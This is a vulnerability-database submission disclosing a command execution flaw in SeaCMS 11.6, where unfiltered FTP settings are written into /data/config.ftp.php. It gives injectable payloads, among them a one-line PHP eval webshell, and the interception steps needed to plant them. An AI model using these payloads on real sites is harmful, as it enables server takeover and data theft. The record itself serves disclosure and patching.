| Field | Value |
|---|---|
| Title | Seacms-v11.6 FTP command execution vulnerability |
| Description | A command execution vulnerability that can be classified as serious has been found. You can insert commands into the forwarded message at the specified FTP location to obtain a webshell. This vulnerability seriously threatens the security of the backend system. Use Burp to capture packets at FTP, insert `edit_ {phpinfo()}=300&` after the `&`, and then forward the message. After forwarding, you can refresh the page or directly access the /data/config.ftp.php file in the root directory. If you write a one-sentence trojan, inserting `edit___ {@ eval ($_POST [a])}=300&` gets the webshell. The received user data is written directly to the PHP file without filtering, resulting in command execution. |
| Source | https://github.com/jidle123/Seacms-v11.6/issues/1 |
| User | jidle (UID 41297) |
| Submission | 02/18/2023 05:38 (3 years ago) |
| Moderation | 02/22/2023 18:46 (5 days later) |
| Status | Accepted |
| VulDB entry | 221630 [SeaCMS 11.6 Picture Management /data/config.ftp.php deserialization] |
| Points | 20 |